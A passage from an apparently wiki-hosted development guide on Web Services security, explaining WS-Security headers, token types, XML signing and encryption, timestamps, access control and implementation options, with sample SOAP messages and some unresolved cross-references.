 &lt;br /&gt;
         &amp;lt;/wsse:Security&amp;gt;&lt;br /&gt;
    &amp;lt;/soap:Header&amp;gt;&lt;br /&gt;
     &amp;lt;soap:Body&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
     &amp;lt;/soap:Body&amp;gt;&lt;br /&gt;
 &amp;lt;/soap:Envelope&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
However, to be useful, it must carry some information, which is going to help securing the message. It means including one or more security tokens (see 0) with references, XML Signature, and XML Encryption elements, if the message is signed and/or encrypted. So, a typical header will look more like the following picture: &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;soap:Envelope xmlns:soap=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;soap:Header&amp;gt;&lt;br /&gt;
     &amp;lt;wsse:Security xmlns=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd&amp;quot; xmlns:wsse=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd&amp;quot; xmlns:wsu=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd&amp;quot; soap:mustUnderstand=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
       &amp;lt;wsse:BinarySecurityToken EncodingType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot; wsu:Id=&amp;quot;aXhOJ5&amp;quot;&amp;gt;MIICtzCCAi... &lt;br /&gt;
       &amp;lt;/wsse:BinarySecurityToken&amp;gt;&lt;br /&gt;
       &amp;lt;xenc:EncryptedKey xmlns:xenc=&amp;quot;http://www.w3.org/2001/04/xmlenc#&amp;quot;&amp;gt;&lt;br /&gt;
         &amp;lt;xenc:EncryptionMethod Algorithm=&amp;quot;http://www.w3.org/2001/04/xmlenc#rsa-1_5&amp;quot;/&amp;gt;&lt;br /&gt;
 	&amp;lt;dsig:KeyInfo xmlns:dsig=&amp;quot;http://www.w3.org/2000/09/xmldsig#&amp;quot;&amp;gt;&lt;br /&gt;
 	  &amp;lt;wsse:SecurityTokenReference&amp;gt;&lt;br /&gt;
 	    &amp;lt;wsse:Reference URI=&amp;quot;#aXhOJ5&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot;/&amp;gt;&lt;br /&gt;
 	  &amp;lt;/wsse:SecurityTokenReference&amp;gt;  &lt;br /&gt;
 	&amp;lt;/dsig:KeyInfo&amp;gt;&lt;br /&gt;
   	&amp;lt;xenc:CipherData&amp;gt;&lt;br /&gt;
   	  &amp;lt;xenc:CipherValue&amp;gt;Nb0Mf...&amp;lt;/xenc:CipherValue&amp;gt;&lt;br /&gt;
   	&amp;lt;/xenc:CipherData&amp;gt;&lt;br /&gt;
   	&amp;lt;xenc:ReferenceList&amp;gt;&lt;br /&gt;
   	  &amp;lt;xenc:DataReference URI=&amp;quot;#aDNa2iD&amp;quot;/&amp;gt;&lt;br /&gt;
   	&amp;lt;/xenc:ReferenceList&amp;gt;&lt;br /&gt;
       &amp;lt;/xenc:EncryptedKey&amp;gt;&lt;br /&gt;
       &amp;lt;wsse:SecurityTokenReference wsu:Id=&amp;quot;aZG0sG&amp;quot;&amp;gt;&lt;br /&gt;
 	&amp;lt;wsse:KeyIdentifier ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID&amp;quot; wsu:Id=&amp;quot;a2tv1Uz&amp;quot;&amp;gt; 1106844369755&amp;lt;/wsse:KeyIdentifier&amp;gt;&lt;br /&gt;
       &amp;lt;/wsse:SecurityTokenReference&amp;gt;&lt;br /&gt;
       &amp;lt;saml:Assertion AssertionID=&amp;quot;1106844369755&amp;quot; IssueInstant=&amp;quot;2005-01-27T16:46:09.755Z&amp;quot; Issuer=&amp;quot;www.my.com&amp;quot; MajorVersion=&amp;quot;1&amp;quot; MinorVersion=&amp;quot;1&amp;quot; xmlns:saml=&amp;quot;urn:oasis:names:tc:SAML:1.0:assertion&amp;quot;&amp;gt;&lt;br /&gt;
 		...				&lt;br /&gt;
       &amp;lt;/saml:Assertion&amp;gt;&lt;br /&gt;
       &amp;lt;wsu:Timestamp wsu:Id=&amp;quot;afc6fbe-a7d8-fbf3-9ac4-f884f435a9c1&amp;quot;&amp;gt;&lt;br /&gt;
 	&amp;lt;wsu:Created&amp;gt;2005-01-27T16:46:10Z&amp;lt;/wsu:Created&amp;gt;&lt;br /&gt;
 	&amp;lt;wsu:Expires&amp;gt;2005-01-27T18:46:10Z&amp;lt;/wsu:Expires&amp;gt;&lt;br /&gt;
      &amp;lt;/wsu:Timestamp&amp;gt;&lt;br /&gt;
       &amp;lt;dsig:Signature xmlns:dsig=&amp;quot;http://www.w3.org/2000/09/xmldsig#&amp;quot; Id=&amp;quot;sb738c7&amp;quot;&amp;gt;&lt;br /&gt;
 	&amp;lt;dsig:SignedInfo Id=&amp;quot;obLkHzaCOrAW4kxC9az0bLA22&amp;quot;&amp;gt;&lt;br /&gt;
 		...&lt;br /&gt;
 	  &amp;lt;dsig:Reference URI=&amp;quot;#s91397860&amp;quot;&amp;gt;&lt;br /&gt;
 		...									&lt;br /&gt;
             &amp;lt;dsig:DigestValue&amp;gt;5R3GSp+OOn17lSdE0knq4GXqgYM=&amp;lt;/dsig:DigestValue&amp;gt;&lt;br /&gt;
 	  &amp;lt;/dsig:Reference&amp;gt;&lt;br /&gt;
 	  &amp;lt;/dsig:SignedInfo&amp;gt;&lt;br /&gt;
 	  &amp;lt;dsig:SignatureValue Id=&amp;quot;a9utKU9UZk&amp;quot;&amp;gt;LIkagbCr5bkXLs8l...&amp;lt;/dsig:SignatureValue&amp;gt;&lt;br /&gt;
 	  &amp;lt;dsig:KeyInfo&amp;gt;&lt;br /&gt;
 	  &amp;lt;wsse:SecurityTokenReference&amp;gt;&lt;br /&gt;
 	    &amp;lt;wsse:Reference URI=&amp;quot;#aXhOJ5&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot;/&amp;gt;&lt;br /&gt;
 	  &amp;lt;/wsse:SecurityTokenReference&amp;gt;&lt;br /&gt;
         &amp;lt;/dsig:KeyInfo&amp;gt;&lt;br /&gt;
       &amp;lt;/dsig:Signature&amp;gt;&lt;br /&gt;
     &amp;lt;/wsse:Security&amp;gt;&lt;br /&gt;
   &amp;lt;/soap:Header&amp;gt;&lt;br /&gt;
   &amp;lt;soap:Body xmlns:wsu=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd&amp;quot; wsu:Id=&amp;quot;s91397860&amp;quot;&amp;gt;&lt;br /&gt;
     &amp;lt;xenc:EncryptedData xmlns:xenc=&amp;quot;http://www.w3.org/2001/04/xmlenc#&amp;quot; Id=&amp;quot;aDNa2iD&amp;quot; Type=&amp;quot;http://www.w3.org/2001/04/xmlenc#Content&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xenc:EncryptionMethod Algorithm=&amp;quot;http://www.w3.org/2001/04/xmlenc#tripledes-cbc&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;xenc:CipherData&amp;gt;&lt;br /&gt;
 	&amp;lt;xenc:CipherValue&amp;gt;XFM4J6C...&amp;lt;/xenc:CipherValue&amp;gt;&lt;br /&gt;
       &amp;lt;/xenc:CipherData&amp;gt;&lt;br /&gt;
     &amp;lt;/xenc:EncryptedData&amp;gt;&lt;br /&gt;
   &amp;lt;/soap:Body&amp;gt;&lt;br /&gt;
 &amp;lt;/soap:Envelope&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Types of tokens ===&lt;br /&gt;
&lt;br /&gt;
A WSS Header may have the following types of security tokens in it:&lt;br /&gt;
&lt;br /&gt;
* Username token&lt;br /&gt;
&lt;br /&gt;
Defines mechanisms to pass username and, optionally, a password - the latter is described in the username profile document. Unless the whole token is encrypted, a message which includes a clear-text password should always be transmitted via a secured channel. In situations where the target Web Service has access to clear-text passwords for verification (this might not be possible with LDAP or some other user directories, which do not return clear-text passwords), using a hashed version with nonce and a timestamp is generally preferable. The profile document defines an unambiguous algorithm for producing password hash: &lt;br /&gt;
&lt;br /&gt;
''Password_Digest = Base64 ( SHA-1 ( nonce + created + password ) )''&lt;br /&gt;
&lt;br /&gt;
* Binary token&lt;br /&gt;
&lt;br /&gt;
They are used to convey binary data, such as X.509 certificates, in a text-encoded format, Base64 by default. The core specification defines BinarySecurityToken element, while profile documents specify additional attributes and sub-elements to handle attachment of various tokens. Presently, both the X.509 and the Kerberos profiles have been adopted.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;wsse:BinarySecurityToken EncodingType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot; wsu:Id=&amp;quot;aXhOJ5&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''        MIICtzCCAi...''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/wsse:BinarySecurityToken&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* XML token&lt;br /&gt;
&lt;br /&gt;
These are meant for any kind of XML-based tokens, but primarily – for SAML assertions. The core specification merely mentions the possibility of inserting such tokens, leaving all details to the profile documents. At the moment, SAML 1.1 profile has been accepted by OASIS.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;saml:Assertion AssertionID=&amp;quot;1106844369755&amp;quot; IssueInstant=&amp;quot;2005-01-27T16:46:09.755Z&amp;quot; Issuer=&amp;quot;www.my.com&amp;quot; MajorVersion=&amp;quot;1&amp;quot; MinorVersion=&amp;quot;1&amp;quot; xmlns:saml=&amp;quot;urn:oasis:names:tc:SAML:1.0:assertion&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''		...				''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;/saml:Assertion&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Although technically it is not a security token, a Timestamp element may be inserted into a security header to ensure message’s freshness. See the further reading section for a design pattern on this.&lt;br /&gt;
&lt;br /&gt;
===Referencing message parts ===&lt;br /&gt;
&lt;br /&gt;
In order to retrieve security tokens, passed in the message, or to identify signed and encrypted message parts, the core specification adopts usage of a special attribute, wsu:Id. The only requirement on this attribute is that the values of such IDs should be unique within the scope of XML document where they are defined. Its application has a significant advantage for the intermediate processors, as it does not require understanding of the message’s XML Schema. Unfortunately, XML Signature and Encryption specifications do not allow for attribute extensibility (i.e. they have closed schema), so, when trying to locate signature or encryption elements, local IDs of the Signature and Encryption elements must be considered first.&lt;br /&gt;
&lt;br /&gt;
WSS core specification also defines a general mechanism for referencing security tokens via SecurityTokenReference element. An example of such element, referring to a SAML assertion in the same header, is provided below:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsse:SecurityTokenReference wsu:Id=&amp;quot;aZG0sGbRpXLySzgM1X6aSjg22&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;wsse:KeyIdentifier ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID&amp;quot; wsu:Id=&amp;quot;a2tv1Uz&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''            1106844369755''&lt;br /&gt;
&lt;br /&gt;
''          &amp;lt;/wsse:KeyIdentifier&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;/wsse:SecurityTokenReference&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
As this element was designed to refer to pretty much any possible token type (including encryption keys, certificates, SAML assertions, etc) both internal and external to the WSS Header, it is enormously complicated. The specification recommends using two of its possible four reference types – Direct References (by URI) and Key Identifiers (some kind of token identifier). Profile documents (SAML, X.509 for instance) provide additional extensions to these mechanisms to take advantage of specific qualities of different token types.&lt;br /&gt;
&lt;br /&gt;
==Communication Protection Mechanisms ==&lt;br /&gt;
&lt;br /&gt;
As was already explained earlier (see 0), channel security, while providing important services, is not a panacea, as it does not solve many of the issues facing Web Service developers. WSS helps addressing some of them at the SOAP message level, using the mechanisms described in the sections below.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Integrity ===&lt;br /&gt;
&lt;br /&gt;
WSS specification makes use of the XML-dsig standard to ensure message integrity, restricting its functionality in certain cases; for instance, only explicitly referenced elements can be signed (i.e. no Embedding or Embedded signature modes are allowed). Prior to signing an XML document, a transformation is required to create its canonical representation, taking into account the fact that XML documents can be represented in a number of semantically equivalent ways. There are two main transformations defined by the XML Digital Signature WG at W3C, Inclusive and Exclusive Canonicalization Transforms (C14N and EXC-C14N), which differ in the way namespace declarations are processed. The WSS core specification specifically recommends using EXC-C14N, as it allows copying signed XML content into other documents without invalidating the signature.&lt;br /&gt;
&lt;br /&gt;
In order to provide a uniform way of addressing signed tokens, WSS adds a Security Token Reference (STR) Dereference Transform option, which is comparable with dereferencing a pointer to an object of specific data type in programming languages. Similarly, in addition to the XML Signature-defined ways of addressing signing keys, WSS allows for references to signing security tokens through the STR mechanism (explained in 0), extended by token profiles to accommodate specific token types. A typical signature example is shown in an earlier sample in the section 0.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
Typically, an XML signature is applied to secure elements such as SOAP Body and the timestamp, as well as any user credentials, passed in the request. There is an interesting twist when a particular element is both signed and encrypted, since these operations may follow (even repeatedly) in any order, and knowledge of their ordering is required for signature verification. To address this issue, the WSS core specification requires that each new element is pre-pended to the security header, thus defining the “natural” order of operations. A particularly nasty problem arises when there are several security headers in a single SOAP message, using overlapping signature and encryption blocks, as there is nothing in this case that would point to the right order of operations.&lt;br /&gt;
&lt;br /&gt;
===Confidentiality ===&lt;br /&gt;
&lt;br /&gt;
For its confidentiality protection, WSS relies on yet another standard, XML Encryption. Similarly to XML-dsig, this standard operates on selected elements of the SOAP message, but it then replaces the encrypted element’s data with a &amp;lt;xenc:EncryptedData&amp;gt; sub-element carrying the encrypted bytes. For encryption efficiency, the specification recommends using a unique key, which is then encrypted by the recipient’s public key and pre-pended to the security header in a &amp;lt;xenc:EncryptedKey&amp;gt; element. A SOAP message with encrypted body is shown in the section 0.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Freshness ===&lt;br /&gt;
&lt;br /&gt;
SOAP messages’ freshness is addressed via timestamp mechanism – each security header may contain just one such element, which states, in UTC time and using the UTC time format, creation and expiration moments of the security header. It is important to realize that the timestamp is applied to the WSS Header, not to the SOAP message itself, since the latter may contain multiple security headers, each with a different timestamp. There is an unresolved problem with this “single timestampt” approach, since, once the timestamp is created and signed, it is impossible to update it without breaking existing signatures, even in case of a legitimate change in the WSS Header.&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;wsu:Timestamp wsu:Id=&amp;quot;afc6fbe-a7d8-fbf3-9ac4-f884f435a9c1&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsu:Created&amp;gt;2005-01-27T16:46:10Z&amp;lt;/wsu:Created&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsu:Expires&amp;gt;2005-01-27T18:46:10Z&amp;lt;/wsu:Expires&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/wsu:Timestamp&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
If a timestamp is included in a message, it is typically signed to prevent tampering and replay attacks. There is no mechanism foreseen to address clock synchronization issue (which, as was already point out earlier, is generally not an issue in modern day systems) – this has to be addressed out-of-band as far as the WSS mechanics is concerned. See the further reading section for a design pattern addressing this issue.&lt;br /&gt;
&lt;br /&gt;
==Access Control Mechanisms ==&lt;br /&gt;
&lt;br /&gt;
When it comes to access control decisions, Web Services do not offer specific protection mechanisms by themselves – they just have the means to carry the tokens and data payloads in a secure manner between source and destination SOAP endpoints. &lt;br /&gt;
&lt;br /&gt;
For more complete description of access control tasks, please, refer to other sections of this Development Guide.&lt;br /&gt;
&lt;br /&gt;
===Identification ===&lt;br /&gt;
&lt;br /&gt;
Identification represents a claim to have certain identity, which is expressed by attaching certain information to the message. This can be a username, an SAML assertion, a Kerberos ticket, or any other piece of information, from which the service can infer who the caller claims to be. &lt;br /&gt;
&lt;br /&gt;
WSS represents a very good way to convey this information, as it defines an extensible mechanism for attaching various token types to a message (see 0). It is the receiver’s job to extract the attached token and figure out which identity it carries, or to reject the message if it can find no acceptable token in it.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Authentication ===&lt;br /&gt;
&lt;br /&gt;
Authentication can come in two flavors – credentials verification or token validation. The subtle difference between the two is that tokens are issued after some kind of authentication has already happened prior to the current invocation, and they usually contain user’s identity along with the proof of its integrity. &lt;br /&gt;
&lt;br /&gt;
WSS offers support for a number of standard authentication protocols by defining binding mechanism for transmitting protocol-specific tokens and reliably linking them to the sender. However, the mechanics of proof that the caller is who he claims to be is completely at the Web Service’s discretion. Whether it takes the supplied username and password’s hash and checks it against the backend user store, or extracts subject name from the X.509 certificate used for signing the message, verifies the certificate chain and looks up the user in its store – at the moment, there are no requirements or standards which would dictate that it should be done one way or another. &lt;br /&gt;
&lt;br /&gt;
===Authorization ===&lt;br /&gt;
&lt;br /&gt;
XACML may be used for expressing authorization rules, but its usage is not Web Service-specific – it has much broader scope. So, whatever policy or role-based authorization mechanism the host server already has in place will most likely be utilized to protect the deployed Web Services deployed as well. &lt;br /&gt;
&lt;br /&gt;
Depending on the implementation, there may be several layers of authorization involved at the server. For instance, JSRs 224 (JAX-RPC 2.0) and 109 (Implementing Enterprise Web Services), which define Java binding for Web Services, specify implementing Web Services in J2EE containers. This means that when a Web Service is accessed, there will be a URL authorization check executed by the J2EE container, followed by a check at the Web Service layer for the Web Service-specific resource. Granularity of such checks is implementation-specific and is not dictated by any standards. In the Windows universe it happens in a similar fashion, since IIS is going to execute its access checks on the incoming HTTP calls before they reach the ASP.NET runtime, where SOAP message is going to be further decomposed and analyzed.&lt;br /&gt;
&lt;br /&gt;
===Policy Agreement ===&lt;br /&gt;
&lt;br /&gt;
Normally, Web Services’ communication is based on the endpoint’s public interface, defined in its WSDL file. This descriptor has sufficient details to express SOAP binding requirements, but it does not define any security parameters, leaving Web Service developers struggling to find out-of-band mechanisms to determine the endpoint’s security requirements. &lt;br /&gt;
&lt;br /&gt;
To make up for these shortcomings, WS-Policy specification was conceived as a mechanism for expressing complex policy requirements and qualities, sort of WSDL on steroids. Through the published policy SOAP endpoints can advertise their security requirements, and their clients can apply appropriate measures of message protection to construct the requests. The general WS-Policy specification (actually comprised of three separate documents) also has extensions for specific policy types, one of them – for security, WS-SecurityPolicy.&lt;br /&gt;
&lt;br /&gt;
If the requestor does not possess the required tokens, it can try obtaining them via trust mechanism, using WS-Trust-enabled services, which are called to securely exchange various token types for the requested identity. &lt;br /&gt;
&lt;br /&gt;
[[Image: Using Trust Service.gif|Figure 5. Using Trust service]]&lt;br /&gt;
&lt;br /&gt;
Unfortunately, both WS-Policy and WS-Trust specifications have not been submitted for standardization to public bodies, and their development is progressing via private collaboration of several companies, although it was opened up for other participants as well. As a positive factor, there have been several interoperability events conducted for these specifications, so the development process of these critical links in the Web Services’ security infrastructure is not a complete black box.&lt;br /&gt;
&lt;br /&gt;
==Forming Web Service Chains ==&lt;br /&gt;
&lt;br /&gt;
Many existing or planned implementations of SOA or B2B systems rely on dynamic chains of Web Services for accomplishing various business specific tasks, from taking the orders through manufacturing and up to the distribution process. &lt;br /&gt;
&lt;br /&gt;
[[Image:Service Chain.gif|Figure 6: Service chain]]&lt;br /&gt;
&lt;br /&gt;
This is in theory. In practice, there are a lot of obstacles hidden among the way, and one of the major ones among them – security concerns about publicly exposing processing functions to intra- or Internet-based clients. &lt;br /&gt;
&lt;br /&gt;
Here are just a few of the issues that hamper Web Services interaction – incompatible authentication and authorization models for users, amount of trust between services themselves and ways of establishing such trust, maintaining secure connections, and synchronization of user directories or otherwise exchanging users’ attributes. These issues will be briefly tackled in the following paragraphs.&lt;br /&gt;
&lt;br /&gt;
===Incompatible user access control models ===&lt;br /&gt;
&lt;br /&gt;
As explained earlier, in section 0, Web Services themselves do not include separate extensions for access control, relying instead on the existing security framework. What they do provide, however, are mechanisms for discovering and describing security requirements of a SOAP service (via WS-Policy), and for obtaining appropriate security credentials via WS-Trust based services.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Service trust ===&lt;br /&gt;
&lt;br /&gt;
In order to establish mutual trust between client and service, they have to satisfy each other’s policy requirements. A simple and popular model is mutual certificate authentication via SSL, but it is not scalable for open service models, and supports only one authentication type. Services that require more flexibility have to use pretty much the same access control mechanisms as with users to establish each other’s identities prior to engaging in a conversation.&lt;br /&gt;
&lt;br /&gt;
===Secure connections ===&lt;br /&gt;
&lt;br /&gt;
Once trust is established it would be impractical to require its confirmation on each interaction. Instead, a secure client-server link is formed and maintained the entire time a client’s session is active. Again, the most popular mechanism today for maintaining such link is SSL, but it is not a Web Service-specific mechanism, and it has a number of shortcomings when applied to SOAP communication, as explained in 0.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Synchronization of user directories ===&lt;br /&gt;
&lt;br /&gt;
This is a very acute problem when dealing with cross-domain applications, as users’ population tends to change frequently among different domains. So, how does a service in domain B decide whether it is going to trust user’s claim that he has been already authenticated in domain A? There exist different aspects of this problem. First – a common SSO mechanism, which implies that a user is known in both domains (through synchronization, or by some other means), and authentication tokens from one domain are acceptable in another. In Web Services world, this would be accomplished by passing around a SAML or Kerberos token for a user. &lt;br /&gt;
&lt;br /&gt;
===Domain federation ===&lt;br /&gt;
&lt;br /&gt;
Another aspect of the problem is when users are not shared across domains, but merely the fact that a user with certain ID has successfully authenticated in another domain, as would be the case with several large corporations, which would like to form a partnership, but would be reluctant to share customers’ details. The decision to accept this request is then based on the inter-domain procedures, establishing special trust relationships and allowing for exchanging such opaque tokens, which would be an example of Federation relationships. Of those efforts, most notable example is Liberty Alliance project, which is now being used as a basis for SAML 2.0 specifications. The work in this area is still far from being completed, and most of the existing deployments are nothing more than POC or internal pilot projects than to real cross-companies deployments, although LA’s website does list some case studies of large-scale projects.&lt;br /&gt;
&lt;br /&gt;
==Available Implementations ==&lt;br /&gt;
&lt;br /&gt;
It is important to realize from the beginning that no security standard by itself is going to provide security to the message exchanges – it is the installed implementations, which will be assessing conformance of the incoming SOAP messages to the applicable standards, as well as appropriately securing the outgoing messages.&lt;br /&gt;
&lt;br /&gt;
===.NET – Web Service Extensions ===&lt;br /&gt;
&lt;br /&gt;
Since new standards are being developed at a rather quick pace, .NET platform is not trying to catch up immediately, but uses Web Service Extensions (WSE) instead. WSE, currently at the version 2.0, adds development and runtime support for the latest Web Service security standards to the platform and development tools, even while they are still “work in progress”. Once standards mature, their support is incorporated into new releases of the .NET platform, which is what is going to happen when .NET 2.0 finally sees the world. The next release of WSE, 3.0, is going to coincide with VS.2005 release and will take advantages of the latest innovations of .NET 2.0 platform in messaging and Web Application areas.&lt;br /&gt;
&lt;br /&gt;
Considering that Microsoft is one of the most active players in the Web Service security area and recognizing its influence in the industry, its WSE implementation is probably one of the most complete and up to date, and it is strongly advisable to run at least a quick interoperability check with WSE-secured .NET Web Service clients. If you have a Java-based Web Service, and the interoperability is a requirement (which is usually the case), in addition to the questions of security testing one needs to keep in mind the basic interoperability between Java and .NET Web Service data structures. &lt;br /&gt;
&lt;br /&gt;
This is especially important since current versions of .NET Web Service tools frequently do not cleanly handle WS-Security’s and related XML schemas as published by OASIS, so some creativity on the part of a Web Service designer is needed. That said – WSE package itself contains very rich and well-structured functionality, which can be utilized both with ASP.NET-based and standalone Web Service clients to check incoming SOAP messages and secure outgoing ones at the infrastructure level, relieving Web Service programmers from knowing these details. Among other things, WSE 2.0 supports the most recent set of WS-Policy and WS-Security profiles, providing for basic message security and WS-Trust with WS-SecureConversation. Those are needed for establishing secure exchanges and sessions - similar to what SSL does at the transport level, but applied to message-based communication.&lt;br /&gt;
&lt;br /&gt;
===Java toolkits ===&lt;br /&gt;
&lt;br /&gt;
Most of the publicly available Java toolkits work at the level of XML security, i.e. XML-dsig and XML-enc – such as IBM’s XML Security Suite and Apache’s XML Security Java project. Java’s JSR 105 and JSR 106 (still not finalized) define Java bindings for signatures and encryption, which will allow plugging the implementations as JCA providers once work on those JSRs is completed. &lt;br /&gt;
&lt;br /&gt;
Moving one level up, to address Web Services themselves, the picture becomes muddier – at the moment, there are many implementations in various stages of incompleteness. For instance, Apache is currently working on the WSS4J project, which is moving rather slowly, and there is commercial software package from Phaos (now owned by Oracle), which suffers from a lot of implementation problems.&lt;br /&gt;
&lt;br /&gt;
A popular choice among Web Service developers today is Sun’s JWSDP, which includes support for Web Service security. However, its support for Web Service security specifications in the version 1.5 is only limited to implementation of the core WSS standard with username and X.509 certificate profiles. Security features are implemented as part of the JAX-RPC framework and configuration-driven, which allows for clean separation from the Web Service’s implementation.&lt;br /&gt;
&lt;br /&gt;
===Hardware, software systems ===&lt;br /&gt;
&lt;br /&gt;
This category includes complete systems, rather than toolkits or frameworks. On one hand, they usually provide rich functionality right off the shelf, on the other hand – its usage model is rigidly constrained by the solution’s architecture and implementation. This is in contrast to the toolkits, which do not provide any services by themselves, but handing system developers necessary tools to include the desired Web Service security features in their products… or to shoot themselves in the foot by applying them inappropriately.&lt;br /&gt;
&lt;br /&gt;
These systems can be used at the infrastructure layer to verify incoming messages against the effective policy, check signatures, tokens, etc, before passing them on to the target Web Service. When applied to the outgoing SOAP messages, they act as a proxy, now altering the messages to decorate with the required security elements, sign and/or encrypt them.&lt;br /&gt;
&lt;br /&gt;
Software systems are characterized by significant configuration flexibility, but comparatively slow processing. On the bright side, they often provide high level of integration with the existing enterprise infrastructure, relying on the back-end user and policy stores to look at the credentials, extracted from the WSS header, from the broader perspective. An example of such service is TransactionMinder from the former Netegrity – a Policy Enforcement Point for Web Services behind it, layered on top of the Policy Server, which makes policy decisions by checking the extracted credentials against the configured stores and policies.&lt;br /&gt;
&lt;br /&gt;
For hardware systems, performance is the key – they have already broken gigabyte processing threshold, and allow for real-time processing of huge documents, decorated according to the variety of the latest Web Service security standards, not only WSS. The usage simplicity is another attractive point of those systems - in the most trivial cases, the hardware box may be literally dropped in, plugged, and be used right away. These qualities come with a price, however – this performance and simplicity can be achieved as long as the user stays within the pre-configured confines of the hardware box. The moment he tries to integrate with the back-end stores via callbacks (for those solutions that have this capability, since not all of them do), most of the advantages are lost. As an example of such hardware device, Layer 7 Technologies provides a scalable SecureSpan Networking Gateway, which acts both as the inbound firewall and the outbound proxy to handle XML traffic in real time.&lt;br /&gt;
&lt;br /&gt;
==Problems ==&lt;br /&gt;
&lt;br /&gt;
As is probably clear from the previous sections, Web Services are still experiencing a lot of turbulence, and it will take a while before they can really catch on. Here is a brief look at what problems surround currently existing security standards and their implementations.&lt;br /&gt;
&lt;br /&gt;
===Immaturity of the standards ===&lt;br /&gt;
&lt;br /&gt;
Most of the standards are either very recent (couple years old at most), or still being developed. Although standards development is done in committees, which, presumably, reduces risks by going through an exhaustive reviewing and commenting process, some error scenarios still slip in periodically, as no theory can possibly match the testing resulting from pounding by thousands of developers working in the real field. &lt;br /&gt;
&lt;br /&gt;
Additionally, it does not help that for political reasons some of these standards are withheld from public process, which is the case with many standards from the WSA arena (see 0), or that some of the efforts are duplicated, as was the case with LA and WS-Federation specifications.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Performance ===&lt;br /&gt;
&lt;br /&gt;
XML parsing is a slow task, which is an accepted reality, and SOAP processing slows it down even more. Now, with expensive cryptographic and textual conversion operations thrown into the mix, these tasks become a performance bottleneck, even with the latest crypto- and XML-processing hardware solutions offered today. All of the products currently on the market are facing this issue, and they are trying to resolve it with varying degrees of success. &lt;br /&gt;
&lt;br /&gt;
Hardware solutions, while substantially (by orders of magnitude) improving the performance, cannot always be used as an optimal solution, as they cannot be easily integrated with the already existing back-end software infrastructure, at least – not without making performance sacrifices. Another consideration whether hardware-based systems are the right solution – they are usually highly specialized in what they are doing, while modern Application Servers and security frameworks can usually offer a much greater variety of protection mechanisms, protecting not only Web Services, but also other deployed applications in a uniform and consistent way.&lt;br /&gt;
&lt;br /&gt;
===Complexity and interoperability ===&lt;br /&gt;
&lt;br /&gt;
